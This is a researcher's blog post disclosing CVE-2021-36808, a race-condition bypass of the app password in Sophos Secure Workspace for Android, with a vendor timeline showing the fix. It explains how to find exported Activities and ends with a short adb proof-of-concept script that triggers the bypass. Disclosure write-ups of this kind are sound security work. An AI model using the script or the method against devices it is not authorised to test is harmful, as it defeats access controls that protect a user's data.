Skip to main content
  1. Posts/

Sophos Secure Workspace App Password Bypass using Race Condition

·2 mins
Sophos bugbounty race condition Sophos Secure Workspace CVE-2021-36808
A race condition in Sophos Secure Workspace (Android) version 9.7.3081 that bypassed the App Password.

An Activity is an application component that provides a UI for users to interact with. A typical application will have multiple Activity screens that perform different functions, such as a main Activity screen and a separate settings Activity screen.

During a Mobile Penetration Engagement, I always check the App components that are exported, This means that they can be directly called by other Applications. In some cases these exported apps can be use as a leverage to bypass app restrictions ;)

Identifying Exported Activities #

You can look for Exported Activities in the App’s AndroidManifest.xml

  • If the activity has android:exported=“true”
  • If android:exported is missing but it has atleast one intent-filter

Here is an Example of a Exported Activity # 

<activity android:exported="true" android:name="com.app.damnvulnerablebank.SendMoney">

Exported activity with intent filter # 

<activity android:name="com.app.damnvulnerablebank.SplashScreen">
<intent-filter>
<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>
</intent-filter>

You can also use drozer to automate finding exported activities, But I would not recommend this since automated tools are likely to miss something.

I found one, But now what do i do? #

The exploitation of this relies on the functionality of the Activity. If the app uses android-webview We can get an XSS or Open redirect. If you found an activity that export or upload file maybe we can use it to steal sensitive files i.e user token and others.

Timeline #

  • September 04, 2021 - Reported the Vulnerability to Sophos.
  • September 09, 2021 - Sophos acknowledges the Vulnerability.
  • September 27, 2021 - Update 9.7.3115 was released on Google play fixing the bug.

Advisory and CVE #

Proof of Concept # 

adb shell am start -n com.sophos.smenc/com.sophos.smenc.ui.MainActivity
sleep 0.5
adb shell am start -a android.intent.action.MAIN -c android.intent.category.HOME
sleep 0.5
adb shell am start -n com.sophos.smenc/com.sophos.smenc.ui.MainActivity
sleep 0.5
adb shell am start -a android.intent.action.MAIN -c android.intent.category.HOME
sleep 0.5
adb shell am start -n com.sophos.smenc/com.sophos.smenc.ui.MainActivity

#